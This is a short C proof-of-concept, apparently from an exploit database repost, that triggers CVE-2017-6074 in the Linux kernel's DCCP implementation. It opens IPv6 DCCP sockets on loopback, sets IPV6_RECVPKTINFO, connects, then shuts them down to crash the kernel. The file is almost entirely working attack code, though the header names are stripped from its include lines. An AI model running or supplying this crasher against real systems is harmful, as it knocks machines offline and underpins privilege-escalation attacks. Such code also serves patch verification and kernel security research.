// // EDB Note: More information ~ http://seclists.org/oss-sec/2017/q1/471 // // A trigger for CVE-2017-6074, crashes kernel. // Tested on 4.4.0-62-generic #83-Ubuntu kernel. // https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-6074 // // Andrey Konovalov #define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include int main() { struct sockaddr_in6 sa1; sa1.sin6_family = AF_INET6; sa1.sin6_port = htons(20002); inet_pton(AF_INET6, "::1", &sa1.sin6_addr); sa1.sin6_flowinfo = 0; sa1.sin6_scope_id = 0; int optval = 8; int s1 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP); bind(s1, &sa1, 0x20); listen(s1, 0x9); setsockopt(s1, IPPROTO_IPV6, IPV6_RECVPKTINFO, &optval, 4); int s2 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP); connect(s2, &sa1, 0x20); shutdown(s1, SHUT_RDWR); close(s1); shutdown(s2, SHUT_RDWR); close(s2); return 0; } # Iranian Exploit DataBase = http://IeDb.Ir [2017-02-28]